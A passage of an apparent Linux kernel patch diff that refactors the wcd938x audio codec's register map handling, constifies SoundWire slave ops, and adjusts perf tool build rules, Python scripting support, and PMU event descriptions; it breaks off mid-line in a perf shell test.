+-	case WCD938X_DIGITAL_CDC_HPH_GAIN_DSD_2:
+-	case WCD938X_DIGITAL_CDC_AUX_GAIN_DSD_0:
+-	case WCD938X_DIGITAL_CDC_AUX_GAIN_DSD_1:
+-	case WCD938X_DIGITAL_CDC_AUX_GAIN_DSD_2:
+-	case WCD938X_DIGITAL_CDC_HPH_GAIN_CTL:
+-	case WCD938X_DIGITAL_CDC_AUX_GAIN_CTL:
+-	case WCD938X_DIGITAL_CDC_EAR_PATH_CTL:
+-	case WCD938X_DIGITAL_CDC_SWR_CLH:
+-	case WCD938X_DIGITAL_SWR_CLH_BYP:
+-	case WCD938X_DIGITAL_CDC_TX0_CTL:
+-	case WCD938X_DIGITAL_CDC_TX1_CTL:
+-	case WCD938X_DIGITAL_CDC_TX2_CTL:
+-	case WCD938X_DIGITAL_CDC_TX_RST:
+-	case WCD938X_DIGITAL_CDC_REQ_CTL:
+-	case WCD938X_DIGITAL_CDC_RST:
+-	case WCD938X_DIGITAL_CDC_AMIC_CTL:
+-	case WCD938X_DIGITAL_CDC_DMIC_CTL:
+-	case WCD938X_DIGITAL_CDC_DMIC1_CTL:
+-	case WCD938X_DIGITAL_CDC_DMIC2_CTL:
+-	case WCD938X_DIGITAL_CDC_DMIC3_CTL:
+-	case WCD938X_DIGITAL_CDC_DMIC4_CTL:
+-	case WCD938X_DIGITAL_EFUSE_PRG_CTL:
+-	case WCD938X_DIGITAL_EFUSE_CTL:
+-	case WCD938X_DIGITAL_CDC_DMIC_RATE_1_2:
+-	case WCD938X_DIGITAL_CDC_DMIC_RATE_3_4:
+-	case WCD938X_DIGITAL_PDM_WD_CTL0:
+-	case WCD938X_DIGITAL_PDM_WD_CTL1:
+-	case WCD938X_DIGITAL_PDM_WD_CTL2:
+-	case WCD938X_DIGITAL_INTR_MODE:
+-	case WCD938X_DIGITAL_INTR_MASK_0:
+-	case WCD938X_DIGITAL_INTR_MASK_1:
+-	case WCD938X_DIGITAL_INTR_MASK_2:
+-	case WCD938X_DIGITAL_INTR_CLEAR_0:
+-	case WCD938X_DIGITAL_INTR_CLEAR_1:
+-	case WCD938X_DIGITAL_INTR_CLEAR_2:
+-	case WCD938X_DIGITAL_INTR_LEVEL_0:
+-	case WCD938X_DIGITAL_INTR_LEVEL_1:
+-	case WCD938X_DIGITAL_INTR_LEVEL_2:
+-	case WCD938X_DIGITAL_INTR_SET_0:
+-	case WCD938X_DIGITAL_INTR_SET_1:
+-	case WCD938X_DIGITAL_INTR_SET_2:
+-	case WCD938X_DIGITAL_INTR_TEST_0:
+-	case WCD938X_DIGITAL_INTR_TEST_1:
+-	case WCD938X_DIGITAL_INTR_TEST_2:
+-	case WCD938X_DIGITAL_TX_MODE_DBG_EN:
+-	case WCD938X_DIGITAL_TX_MODE_DBG_0_1:
+-	case WCD938X_DIGITAL_TX_MODE_DBG_2_3:
+-	case WCD938X_DIGITAL_LB_IN_SEL_CTL:
+-	case WCD938X_DIGITAL_LOOP_BACK_MODE:
+-	case WCD938X_DIGITAL_SWR_DAC_TEST:
+-	case WCD938X_DIGITAL_SWR_HM_TEST_RX_0:
+-	case WCD938X_DIGITAL_SWR_HM_TEST_TX_0:
+-	case WCD938X_DIGITAL_SWR_HM_TEST_RX_1:
+-	case WCD938X_DIGITAL_SWR_HM_TEST_TX_1:
+-	case WCD938X_DIGITAL_SWR_HM_TEST_TX_2:
+-	case WCD938X_DIGITAL_PAD_CTL_SWR_0:
+-	case WCD938X_DIGITAL_PAD_CTL_SWR_1:
+-	case WCD938X_DIGITAL_I2C_CTL:
+-	case WCD938X_DIGITAL_CDC_TX_TANGGU_SW_MODE:
+-	case WCD938X_DIGITAL_EFUSE_TEST_CTL_0:
+-	case WCD938X_DIGITAL_EFUSE_TEST_CTL_1:
+-	case WCD938X_DIGITAL_PAD_CTL_PDM_RX0:
+-	case WCD938X_DIGITAL_PAD_CTL_PDM_RX1:
+-	case WCD938X_DIGITAL_PAD_CTL_PDM_TX0:
+-	case WCD938X_DIGITAL_PAD_CTL_PDM_TX1:
+-	case WCD938X_DIGITAL_PAD_CTL_PDM_TX2:
+-	case WCD938X_DIGITAL_PAD_INP_DIS_0:
+-	case WCD938X_DIGITAL_PAD_INP_DIS_1:
+-	case WCD938X_DIGITAL_DRIVE_STRENGTH_0:
+-	case WCD938X_DIGITAL_DRIVE_STRENGTH_1:
+-	case WCD938X_DIGITAL_DRIVE_STRENGTH_2:
+-	case WCD938X_DIGITAL_RX_DATA_EDGE_CTL:
+-	case WCD938X_DIGITAL_TX_DATA_EDGE_CTL:
+-	case WCD938X_DIGITAL_GPIO_MODE:
+-	case WCD938X_DIGITAL_PIN_CTL_OE:
+-	case WCD938X_DIGITAL_PIN_CTL_DATA_0:
+-	case WCD938X_DIGITAL_PIN_CTL_DATA_1:
+-	case WCD938X_DIGITAL_DIG_DEBUG_CTL:
+-	case WCD938X_DIGITAL_DIG_DEBUG_EN:
+-	case WCD938X_DIGITAL_ANA_CSR_DBG_ADD:
+-	case WCD938X_DIGITAL_ANA_CSR_DBG_CTL:
+-	case WCD938X_DIGITAL_SSP_DBG:
+-	case WCD938X_DIGITAL_SPARE_0:
+-	case WCD938X_DIGITAL_SPARE_1:
+-	case WCD938X_DIGITAL_SPARE_2:
+-	case WCD938X_DIGITAL_TX_REQ_FB_CTL_0:
+-	case WCD938X_DIGITAL_TX_REQ_FB_CTL_1:
+-	case WCD938X_DIGITAL_TX_REQ_FB_CTL_2:
+-	case WCD938X_DIGITAL_TX_REQ_FB_CTL_3:
+-	case WCD938X_DIGITAL_TX_REQ_FB_CTL_4:
+-	case WCD938X_DIGITAL_DEM_BYPASS_DATA0:
+-	case WCD938X_DIGITAL_DEM_BYPASS_DATA1:
+-	case WCD938X_DIGITAL_DEM_BYPASS_DATA2:
+-	case WCD938X_DIGITAL_DEM_BYPASS_DATA3:
+-		return true;
+-	}
+-
+-	return false;
+-}
+-
+-static bool wcd938x_readonly_register(struct device *dev, unsigned int reg)
+-{
+-	switch (reg) {
+-	case WCD938X_ANA_MBHC_RESULT_1:
+-	case WCD938X_ANA_MBHC_RESULT_2:
+-	case WCD938X_ANA_MBHC_RESULT_3:
+-	case WCD938X_MBHC_MOISTURE_DET_FSM_STATUS:
+-	case WCD938X_TX_1_2_SAR2_ERR:
+-	case WCD938X_TX_1_2_SAR1_ERR:
+-	case WCD938X_TX_3_4_SAR4_ERR:
+-	case WCD938X_TX_3_4_SAR3_ERR:
+-	case WCD938X_HPH_L_STATUS:
+-	case WCD938X_HPH_R_STATUS:
+-	case WCD938X_HPH_SURGE_HPHLR_SURGE_STATUS:
+-	case WCD938X_EAR_STATUS_REG_1:
+-	case WCD938X_EAR_STATUS_REG_2:
+-	case WCD938X_MBHC_NEW_FSM_STATUS:
+-	case WCD938X_MBHC_NEW_ADC_RESULT:
+-	case WCD938X_DIE_CRACK_DIE_CRK_DET_OUT:
+-	case WCD938X_AUX_INT_STATUS_REG:
+-	case WCD938X_LDORXTX_INT_STATUS:
+-	case WCD938X_DIGITAL_CHIP_ID0:
+-	case WCD938X_DIGITAL_CHIP_ID1:
+-	case WCD938X_DIGITAL_CHIP_ID2:
+-	case WCD938X_DIGITAL_CHIP_ID3:
+-	case WCD938X_DIGITAL_INTR_STATUS_0:
+-	case WCD938X_DIGITAL_INTR_STATUS_1:
+-	case WCD938X_DIGITAL_INTR_STATUS_2:
+-	case WCD938X_DIGITAL_INTR_CLEAR_0:
+-	case WCD938X_DIGITAL_INTR_CLEAR_1:
+-	case WCD938X_DIGITAL_INTR_CLEAR_2:
+-	case WCD938X_DIGITAL_SWR_HM_TEST_0:
+-	case WCD938X_DIGITAL_SWR_HM_TEST_1:
+-	case WCD938X_DIGITAL_EFUSE_T_DATA_0:
+-	case WCD938X_DIGITAL_EFUSE_T_DATA_1:
+-	case WCD938X_DIGITAL_PIN_STATUS_0:
+-	case WCD938X_DIGITAL_PIN_STATUS_1:
+-	case WCD938X_DIGITAL_MODE_STATUS_0:
+-	case WCD938X_DIGITAL_MODE_STATUS_1:
+-	case WCD938X_DIGITAL_EFUSE_REG_0:
+-	case WCD938X_DIGITAL_EFUSE_REG_1:
+-	case WCD938X_DIGITAL_EFUSE_REG_2:
+-	case WCD938X_DIGITAL_EFUSE_REG_3:
+-	case WCD938X_DIGITAL_EFUSE_REG_4:
+-	case WCD938X_DIGITAL_EFUSE_REG_5:
+-	case WCD938X_DIGITAL_EFUSE_REG_6:
+-	case WCD938X_DIGITAL_EFUSE_REG_7:
+-	case WCD938X_DIGITAL_EFUSE_REG_8:
+-	case WCD938X_DIGITAL_EFUSE_REG_9:
+-	case WCD938X_DIGITAL_EFUSE_REG_10:
+-	case WCD938X_DIGITAL_EFUSE_REG_11:
+-	case WCD938X_DIGITAL_EFUSE_REG_12:
+-	case WCD938X_DIGITAL_EFUSE_REG_13:
+-	case WCD938X_DIGITAL_EFUSE_REG_14:
+-	case WCD938X_DIGITAL_EFUSE_REG_15:
+-	case WCD938X_DIGITAL_EFUSE_REG_16:
+-	case WCD938X_DIGITAL_EFUSE_REG_17:
+-	case WCD938X_DIGITAL_EFUSE_REG_18:
+-	case WCD938X_DIGITAL_EFUSE_REG_19:
+-	case WCD938X_DIGITAL_EFUSE_REG_20:
+-	case WCD938X_DIGITAL_EFUSE_REG_21:
+-	case WCD938X_DIGITAL_EFUSE_REG_22:
+-	case WCD938X_DIGITAL_EFUSE_REG_23:
+-	case WCD938X_DIGITAL_EFUSE_REG_24:
+-	case WCD938X_DIGITAL_EFUSE_REG_25:
+-	case WCD938X_DIGITAL_EFUSE_REG_26:
+-	case WCD938X_DIGITAL_EFUSE_REG_27:
+-	case WCD938X_DIGITAL_EFUSE_REG_28:
+-	case WCD938X_DIGITAL_EFUSE_REG_29:
+-	case WCD938X_DIGITAL_EFUSE_REG_30:
+-	case WCD938X_DIGITAL_EFUSE_REG_31:
+-		return true;
+-	}
+-	return false;
+-}
+-
+-static bool wcd938x_readable_register(struct device *dev, unsigned int reg)
+-{
+-	bool ret;
+-
+-	ret = wcd938x_readonly_register(dev, reg);
+-	if (!ret)
+-		return wcd938x_rdwr_register(dev, reg);
+-
+-	return ret;
+-}
+-
+-static bool wcd938x_writeable_register(struct device *dev, unsigned int reg)
+-{
+-	return wcd938x_rdwr_register(dev, reg);
+-}
+-
+-static bool wcd938x_volatile_register(struct device *dev, unsigned int reg)
+-{
+-	if (reg <= WCD938X_BASE_ADDRESS)
+-		return false;
+-
+-	if (reg == WCD938X_DIGITAL_SWR_TX_CLK_RATE)
+-		return true;
+-
+-	if (wcd938x_readonly_register(dev, reg))
+-		return true;
+-
+-	return false;
+-}
+-
+-static struct regmap_config wcd938x_regmap_config = {
+-	.name = "wcd938x_csr",
+-	.reg_bits = 32,
+-	.val_bits = 8,
+-	.cache_type = REGCACHE_RBTREE,
+-	.reg_defaults = wcd938x_defaults,
+-	.num_reg_defaults = ARRAY_SIZE(wcd938x_defaults),
+-	.max_register = WCD938X_MAX_REGISTER,
+-	.readable_reg = wcd938x_readable_register,
+-	.writeable_reg = wcd938x_writeable_register,
+-	.volatile_reg = wcd938x_volatile_register,
+-	.can_multi_write = true,
+-};
+-
+ static const struct regmap_irq wcd938x_irqs[WCD938X_NUM_IRQS] = {
+ 	REGMAP_IRQ_REG(WCD938X_IRQ_MBHC_BUTTON_PRESS_DET, 0, 0x01),
+ 	REGMAP_IRQ_REG(WCD938X_IRQ_MBHC_BUTTON_RELEASE_DET, 0, 0x02),
+@@ -4412,10 +3417,10 @@ static int wcd938x_bind(struct device *dev)
+ 		return -EINVAL;
+ 	}
+ 
+-	wcd938x->regmap = devm_regmap_init_sdw(wcd938x->tx_sdw_dev, &wcd938x_regmap_config);
+-	if (IS_ERR(wcd938x->regmap)) {
+-		dev_err(dev, "%s: tx csr regmap not found\n", __func__);
+-		return PTR_ERR(wcd938x->regmap);
++	wcd938x->regmap = dev_get_regmap(&wcd938x->tx_sdw_dev->dev, NULL);
++	if (!wcd938x->regmap) {
++		dev_err(dev, "could not get TX device regmap\n");
++		return -EINVAL;
+ 	}
+ 
+ 	ret = wcd938x_irq_init(wcd938x, dev);
+diff --git a/sound/soc/codecs/wcd938x.h b/sound/soc/codecs/wcd938x.h
+index ea82039e78435..74b1498fec38b 100644
+--- a/sound/soc/codecs/wcd938x.h
++++ b/sound/soc/codecs/wcd938x.h
+@@ -663,6 +663,7 @@ struct wcd938x_sdw_priv {
+ 	bool is_tx;
+ 	struct wcd938x_priv *wcd938x;
+ 	struct irq_domain *slave_irq;
++	struct regmap *regmap;
+ };
+ 
+ #if IS_ENABLED(CONFIG_SND_SOC_WCD938X_SDW)
+diff --git a/sound/soc/codecs/wsa881x.c b/sound/soc/codecs/wsa881x.c
+index 6c8b1db649b89..046843b57b038 100644
+--- a/sound/soc/codecs/wsa881x.c
++++ b/sound/soc/codecs/wsa881x.c
+@@ -1101,7 +1101,7 @@ static int wsa881x_bus_config(struct sdw_slave *slave,
+ 	return 0;
+ }
+ 
+-static struct sdw_slave_ops wsa881x_slave_ops = {
++static const struct sdw_slave_ops wsa881x_slave_ops = {
+ 	.update_status = wsa881x_update_status,
+ 	.bus_config = wsa881x_bus_config,
+ 	.port_prep = wsa881x_port_prep,
+diff --git a/sound/soc/codecs/wsa883x.c b/sound/soc/codecs/wsa883x.c
+index 58fdb4e9fd978..693e988f30c0f 100644
+--- a/sound/soc/codecs/wsa883x.c
++++ b/sound/soc/codecs/wsa883x.c
+@@ -1073,7 +1073,7 @@ static int wsa883x_port_prep(struct sdw_slave *slave,
+ 	return 0;
+ }
+ 
+-static struct sdw_slave_ops wsa883x_slave_ops = {
++static const struct sdw_slave_ops wsa883x_slave_ops = {
+ 	.update_status = wsa883x_update_status,
+ 	.port_prep = wsa883x_port_prep,
+ };
+diff --git a/sound/soc/intel/common/soc-acpi-intel-byt-match.c b/sound/soc/intel/common/soc-acpi-intel-byt-match.c
+index db5a92b9875a8..87c44f284971a 100644
+--- a/sound/soc/intel/common/soc-acpi-intel-byt-match.c
++++ b/sound/soc/intel/common/soc-acpi-intel-byt-match.c
+@@ -124,7 +124,7 @@ static const struct snd_soc_acpi_codecs rt5640_comp_ids = {
+ };
+ 
+ static const struct snd_soc_acpi_codecs wm5102_comp_ids = {
+-	.num_codecs = 2,
++	.num_codecs = 3,
+ 	.codecs = { "10WM5102", "WM510204", "WM510205"},
+ };
+ 
+diff --git a/sound/usb/caiaq/input.c b/sound/usb/caiaq/input.c
+index 1e2cf2f08eecd..84f26dce7f5d0 100644
+--- a/sound/usb/caiaq/input.c
++++ b/sound/usb/caiaq/input.c
+@@ -804,6 +804,7 @@ int snd_usb_caiaq_input_init(struct snd_usb_caiaqdev *cdev)
+ 
+ 	default:
+ 		/* no input methods supported on this device */
++		ret = -EINVAL;
+ 		goto exit_free_idev;
+ 	}
+ 
+diff --git a/tools/perf/Build b/tools/perf/Build
+index 6dd67e5022955..aa76236228349 100644
+--- a/tools/perf/Build
++++ b/tools/perf/Build
+@@ -56,6 +56,6 @@ CFLAGS_builtin-report.o	   += -DDOCDIR="BUILD_STR($(srcdir_SQ)/Documentation)"
+ perf-y += util/
+ perf-y += arch/
+ perf-y += ui/
+-perf-$(CONFIG_LIBTRACEEVENT) += scripts/
++perf-y += scripts/
+ 
+ gtk-y += ui/gtk/
+diff --git a/tools/perf/Makefile.perf b/tools/perf/Makefile.perf
+index b7d9c42062300..cc2b0ace54bac 100644
+--- a/tools/perf/Makefile.perf
++++ b/tools/perf/Makefile.perf
+@@ -647,13 +647,16 @@ all: shell_compatibility_test $(ALL_PROGRAMS) $(LANG_BINDINGS) $(OTHER_PROGRAMS)
+ # Create python binding output directory if not already present
+ _dummy := $(shell [ -d '$(OUTPUT)python' ] || mkdir -p '$(OUTPUT)python')
+ 
+-$(OUTPUT)python/perf$(PYTHON_EXTENSION_SUFFIX): $(PYTHON_EXT_SRCS) $(PYTHON_EXT_DEPS) $(LIBPERF)
++$(OUTPUT)python/perf$(PYTHON_EXTENSION_SUFFIX): $(PYTHON_EXT_SRCS) $(PYTHON_EXT_DEPS) $(LIBPERF) $(LIBSUBCMD)
+ 	$(QUIET_GEN)LDSHARED="$(CC) -pthread -shared" \
+         CFLAGS='$(CFLAGS)' LDFLAGS='$(LDFLAGS)' \
+ 	  $(PYTHON_WORD) util/setup.py \
+ 	  --quiet build_ext; \
+ 	cp $(PYTHON_EXTBUILD_LIB)perf*.so $(OUTPUT)python/
+ 
++python_perf_target:
++	@echo "Target is: $(OUTPUT)python/perf$(PYTHON_EXTENSION_SUFFIX)"
++
+ please_set_SHELL_PATH_to_a_more_modern_shell:
+ 	$(Q)$$(:)
+ 
+@@ -1151,7 +1154,7 @@ FORCE:
+ .PHONY: all install clean config-clean strip install-gtk
+ .PHONY: shell_compatibility_test please_set_SHELL_PATH_to_a_more_modern_shell
+ .PHONY: .FORCE-PERF-VERSION-FILE TAGS tags cscope FORCE prepare
+-.PHONY: archheaders
++.PHONY: archheaders python_perf_target
+ 
+ endif # force_fixdep
+ 
+diff --git a/tools/perf/builtin-ftrace.c b/tools/perf/builtin-ftrace.c
+index d7fe00f66b831..fb1b66ef2e167 100644
+--- a/tools/perf/builtin-ftrace.c
++++ b/tools/perf/builtin-ftrace.c
+@@ -1228,10 +1228,12 @@ int cmd_ftrace(int argc, const char **argv)
+ 		goto out_delete_filters;
+ 	}
+ 
++	/* Make system wide (-a) the default target. */
++	if (!argc && target__none(&ftrace.target))
++		ftrace.target.system_wide = true;
++
+ 	switch (subcmd) {
+ 	case PERF_FTRACE_TRACE:
+-		if (!argc && target__none(&ftrace.target))
+-			ftrace.target.system_wide = true;
+ 		cmd_func = __cmd_ftrace;
+ 		break;
+ 	case PERF_FTRACE_LATENCY:
+diff --git a/tools/perf/builtin-record.c b/tools/perf/builtin-record.c
+index 8374117e66f6e..be7c0c29d15b0 100644
+--- a/tools/perf/builtin-record.c
++++ b/tools/perf/builtin-record.c
+@@ -1866,7 +1866,7 @@ static void __record__read_lost_samples(struct record *rec, struct evsel *evsel,
+ 	int id_hdr_size;
+ 
+ 	if (perf_evsel__read(&evsel->core, cpu_idx, thread_idx, &count) < 0) {
+-		pr_err("read LOST count failed\n");
++		pr_debug("read LOST count failed\n");
+ 		return;
+ 	}
+ 
+diff --git a/tools/perf/builtin-script.c b/tools/perf/builtin-script.c
+index 69394ac0a20dc..2f185012b9dda 100644
+--- a/tools/perf/builtin-script.c
++++ b/tools/perf/builtin-script.c
+@@ -2288,8 +2288,8 @@ static void setup_scripting(void)
+ {
+ #ifdef HAVE_LIBTRACEEVENT
+ 	setup_perl_scripting();
+-	setup_python_scripting();
+ #endif
++	setup_python_scripting();
+ }
+ 
+ static int flush_scripting(void)
+diff --git a/tools/perf/builtin-stat.c b/tools/perf/builtin-stat.c
+index 387dc9c9e7bee..682db49eef4cb 100644
+--- a/tools/perf/builtin-stat.c
++++ b/tools/perf/builtin-stat.c
+@@ -773,7 +773,7 @@ static int __run_perf_stat(int argc, const char **argv, int run_idx)
+ 		counter->reset_group = false;
+ 		if (bpf_counter__load(counter, &target))
+ 			return -1;
+-		if (!evsel__is_bpf(counter))
++		if (!(evsel__is_bperf(counter)))
+ 			all_counters_use_bpf = false;
+ 	}
+ 
+@@ -789,7 +789,7 @@ static int __run_perf_stat(int argc, const char **argv, int run_idx)
+ 
+ 		if (counter->reset_group || counter->errored)
+ 			continue;
+-		if (evsel__is_bpf(counter))
++		if (evsel__is_bperf(counter))
+ 			continue;
+ try_again:
+ 		if (create_perf_stat_counter(counter, &stat_config, &target,
+diff --git a/tools/perf/pmu-events/arch/powerpc/power9/other.json b/tools/perf/pmu-events/arch/powerpc/power9/other.json
+index 3f69422c21f99..f10bd554521a0 100644
+--- a/tools/perf/pmu-events/arch/powerpc/power9/other.json
++++ b/tools/perf/pmu-events/arch/powerpc/power9/other.json
+@@ -1417,7 +1417,7 @@
+   {
+     "EventCode": "0x45054",
+     "EventName": "PM_FMA_CMPL",
+-    "BriefDescription": "two flops operation completed (fmadd, fnmadd, fmsub, fnmsub) Scalar instructions only. "
++    "BriefDescription": "two flops operation completed (fmadd, fnmadd, fmsub, fnmsub) Scalar instructions only."
+   },
+   {
+     "EventCode": "0x201E8",
+@@ -2017,7 +2017,7 @@
+   {
+     "EventCode": "0xC0BC",
+     "EventName": "PM_LSU_FLUSH_OTHER",
+-    "BriefDescription": "Other LSU flushes including: Sync (sync ack from L2 caused search of LRQ for oldest snooped load, This will either signal a Precise Flush of the oldest snooped loa or a Flush Next PPC); Data Valid Flush Next (several cases of this, one example is store and reload are lined up such that a store-hit-reload scenario exists and the CDF has already launched and has gotten bad/stale data); Bad Data Valid Flush Next (might be a few cases of this, one example is a larxa (D$ hit) return data and dval but can't allocate to LMQ (LMQ full or other reason). Already gave dval but can't watch it for snoop_hit_larx. Need to take the “bad dval” back and flush all younger ops)"
++    "BriefDescription": "Other LSU flushes including: Sync (sync ack from L2 caused search of LRQ for oldest snooped load, This will either signal a Precise Flush of the oldest snooped loa or a Flush Next PPC); Data Valid Flush Next (several cases of this, one example is store and reload are lined up such that a store-hit-reload scenario exists and the CDF has already launched and has gotten bad/stale data); Bad Data Valid Flush Next (might be a few cases of this, one example is a larxa (D$ hit) return data and dval but can't allocate to LMQ (LMQ full or other reason). Already gave dval but can't watch it for snoop_hit_larx. Need to take the 'bad dval' back and flush all younger ops)"
+   },
+   {
+     "EventCode": "0x5094",
+diff --git a/tools/perf/pmu-events/arch/powerpc/power9/pipeline.json b/tools/perf/pmu-events/arch/powerpc/power9/pipeline.json
+index d0265f255de2b..723bffa41c448 100644
+--- a/tools/perf/pmu-events/arch/powerpc/power9/pipeline.json
++++ b/tools/perf/pmu-events/arch/powerpc/power9/pipeline.json
+@@ -442,7 +442,7 @@
+   {
+     "EventCode": "0x4D052",
+     "EventName": "PM_2FLOP_CMPL",
+-    "BriefDescription": "DP vector version of fmul, fsub, fcmp, fsel, fabs, fnabs, fres ,fsqrte, fneg "
++    "BriefDescription": "DP vector version of fmul, fsub, fcmp, fsel, fabs, fnabs, fres ,fsqrte, fneg"
+   },
+   {
+     "EventCode": "0x1F142",
+diff --git a/tools/perf/pmu-events/arch/s390/cf_z16/extended.json b/tools/perf/pmu-events/arch/s390/cf_z16/extended.json
+index c306190fc06f2..c2b10ec1c6e01 100644
+--- a/tools/perf/pmu-events/arch/s390/cf_z16/extended.json
++++ b/tools/perf/pmu-events/arch/s390/cf_z16/extended.json
+@@ -95,28 +95,28 @@
+ 		"EventCode": "145",
+ 		"EventName": "DCW_REQ",
+ 		"BriefDescription": "Directory Write Level 1 Data Cache from Cache",
+-		"PublicDescription": "A directory write to the Level-1 Data cache directory where the returned cache line was sourced from the requestor’s Level-2 cache."
++		"PublicDescription": "A directory write to the Level-1 Data cache directory where the returned cache line was sourced from the requestors Level-2 cache."
+ 	},
+ 	{
+ 		"Unit": "CPU-M-CF",
+ 		"EventCode": "146",
+ 		"EventName": "DCW_REQ_IV",
+ 		"BriefDescription": "Directory Write Level 1 Data Cache from Cache with Intervention",
+-		"PublicDescription": "A directory write to the Level-1 Data cache directory where the returned cache line was sourced from the requestor’s Level-2 cache with intervention."
++		"PublicDescription": "A directory write to the Level-1 Data cache directory where the returned cache line was sourced from the requestors Level-2 cache with intervention."
+ 	},
+ 	{
+ 		"Unit": "CPU-M-CF",
+ 		"EventCode": "147",
+ 		"EventName": "DCW_REQ_CHIP_HIT",
+ 		"BriefDescription": "Directory Write Level 1 Data Cache from Cache with Chip HP Hit",
+-		"PublicDescription": "A directory write to the Level-1 Data cache directory where the returned cache line was sourced from the requestor’s Level-2 cache after using chip level horizontal persistence, Chip-HP hit."
++		"PublicDescription": "A directory write to the Level-1 Data cache directory where the returned cache line was sourced from the requestors Level-2 cache after using chip level horizontal persistence, Chip-HP hit."
+ 	},
+ 	{
+ 		"Unit": "CPU-M-CF",
+ 		"EventCode": "148",
+ 		"EventName": "DCW_REQ_DRAWER_HIT",
+ 		"BriefDescription": "Directory Write Level 1 Data Cache from Cache with Drawer HP Hit",
+-		"PublicDescription": "A directory write to the Level-1 Data cache directory where the returned cache line was sourced from the requestor’s Level-2 cache after using drawer level horizontal persistence, Drawer-HP hit."
++		"PublicDescription": "A directory write to the Level-1 Data cache directory where the returned cache line was sourced from the requestors Level-2 cache after using drawer level horizontal persistence, Drawer-HP hit."
+ 	},
+ 	{
+ 		"Unit": "CPU-M-CF",
+@@ -284,7 +284,7 @@
+ 		"EventCode": "172",
+ 		"EventName": "ICW_REQ_DRAWER_HIT",
+ 		"BriefDescription": "Directory Write Level 1 Instruction Cache from Cache with Drawer HP Hit",
+-		"PublicDescription": "A directory write to the Level-1 Instruction cache directory where the returned cache line was sourced from the requestor’s Level-2 cache using drawer level horizontal persistence, Drawer-HP hit."
++		"PublicDescription": "A directory write to the Level-1 Instruction cache directory where the returned cache line was sourced from the requestors Level-2 cache using drawer level horizontal persistence, Drawer-HP hit."
+ 	},
+ 	{
+ 		"Unit": "CPU-M-CF",
+diff --git a/tools/perf/scripts/Build b/tools/perf/scripts/Build
+index 68d4b54574adb..7d8e2e57faac5 100644
+--- a/tools/perf/scripts/Build
++++ b/tools/perf/scripts/Build
+@@ -1,2 +1,4 @@
+-perf-$(CONFIG_LIBPERL)   += perl/Perf-Trace-Util/
++ifeq ($(CONFIG_LIBTRACEEVENT),y)
++  perf-$(CONFIG_LIBPERL)   += perl/Perf-Trace-Util/
++endif
+ perf-$(CONFIG_LIBPYTHON) += python/Perf-Trace-Util/
+diff --git a/tools/perf/scripts/python/Perf-Trace-Util/Build b/tools/perf/scripts/python/Perf-Trace-Util/Build
+index d5fed4e426179..7d0e33ce6aba4 100644
+--- a/tools/perf/scripts/python/Perf-Trace-Util/Build
++++ b/tools/perf/scripts/python/Perf-Trace-Util/Build
+@@ -1,3 +1,3 @@
+-perf-$(CONFIG_LIBTRACEEVENT) += Context.o
++perf-y += Context.o
+ 
+ CFLAGS_Context.o += $(PYTHON_EMBED_CCOPTS) -Wno-redundant-decls -Wno-strict-prototypes -Wno-unused-parameter -Wno-nested-externs
+diff --git a/tools/perf/scripts/python/Perf-Trace-Util/Context.c b/tools/perf/scripts/python/Perf-Trace-Util/Context.c
+index 895f5fc239653..b0d449f41650f 100644
+--- a/tools/perf/scripts/python/Perf-Trace-Util/Context.c
++++ b/tools/perf/scripts/python/Perf-Trace-Util/Context.c
+@@ -59,6 +59,7 @@ static struct scripting_context *get_scripting_context(PyObject *args)
+ 	return get_args(args, "context", NULL);
+ }
+ 
++#ifdef HAVE_LIBTRACEEVENT
+ static PyObject *perf_trace_context_common_pc(PyObject *obj, PyObject *args)
+ {
+ 	struct scripting_context *c = get_scripting_context(args);
+@@ -90,6 +91,7 @@ static PyObject *perf_trace_context_common_lock_depth(PyObject *obj,
+ 
+ 	return Py_BuildValue("i", common_lock_depth(c));
+ }
++#endif
+ 
+ static PyObject *perf_sample_insn(PyObject *obj, PyObject *args)
+ {
+@@ -178,12 +180,14 @@ static PyObject *perf_sample_srccode(PyObject *obj, PyObject *args)
+ }
+ 
+ static PyMethodDef ContextMethods[] = {
++#ifdef HAVE_LIBTRACEEVENT
+ 	{ "common_pc", perf_trace_context_common_pc, METH_VARARGS,
+ 	  "Get the common preempt count event field value."},
+ 	{ "common_flags", perf_trace_context_common_flags, METH_VARARGS,
+ 	  "Get the common flags event field value."},
+ 	{ "common_lock_depth", perf_trace_context_common_lock_depth,
+ 	  METH_VARARGS,	"Get the common lock depth event field value."},
++#endif
+ 	{ "perf_sample_insn", perf_sample_insn,
+ 	  METH_VARARGS,	"Get the machine code instruction."},
+ 	{ "perf_set_itrace_options", perf_set_itrace_options,
+diff --git a/tools/perf/scripts/python/intel-pt-events.py b/tools/perf/scripts/python/intel-pt-events.py
+index 08862a2582f44..1c76368f13c1a 100644
+--- a/tools/perf/scripts/python/intel-pt-events.py
++++ b/tools/perf/scripts/python/intel-pt-events.py
+@@ -11,7 +11,7 @@
+ # FITNESS FOR A PARTICULAR PURPOSE.  See the GNU General Public License for
+ # more details.
+ 
+-from __future__ import print_function
++from __future__ import division, print_function
+ 
+ import io
+ import os
+diff --git a/tools/perf/tests/make b/tools/perf/tests/make
+index 009d6efb673ce..deb37fb982e97 100644
+--- a/tools/perf/tests/make
++++ b/tools/perf/tests/make
+@@ -62,10 +62,11 @@ lib = lib
+ endif
+ 
+ has = $(shell which $1 2>/dev/null)
++python_perf_so := $(shell $(MAKE) python_perf_target|grep "Target is:"|awk '{print $$3}')
+ 
+ # standard single make variable specified
+ make_clean_all      := clean all
+-make_python_perf_so := python/perf.so
++make_python_perf_so := $(python_perf_so)
+ make_debug          := DEBUG=1
+ make_no_libperl     := NO_LIBPERL=1
+ make_no_libpython   := NO_LIBPYTHON=1
+@@ -204,7 +205,7 @@ test_make_doc    := $(test_ok)
+ test_make_help_O := $(test_ok)
+ test_make_doc_O  := $(test_ok)
+ 
+-test_make_python_perf_so := test -f $(PERF_O)/python/perf.so
++test_make_python_perf_so := test -f $(PERF_O)/$(python_perf_so)
+ 
+ test_make_perf_o           := test -f $(PERF_O)/perf.o
+ test_make_util_map_o       := test -f $(PERF_O)/util/map.o
+diff --git a/tools/perf/tests/shell/record_offcpu.sh b/tools/perf/tests/shell/record_offcpu.sh
+index e01973d4e0fba..f062ae9a95e1a 100755
+--- a/tools/perf/tests/shell/record_offcpu.sh
++++ b/tools/perf/tests/shell/record_offcpu.sh
+@@ -65,7 +65,7 @@ test_offcpu_child() {
+ 
+   # perf bench sched messaging creates 400 processes
+   if ! perf record --off-cpu -e dummy -o ${perfdata} -- \
+-    perf bench sched messaging -g 10 > /dev/null 2&>1
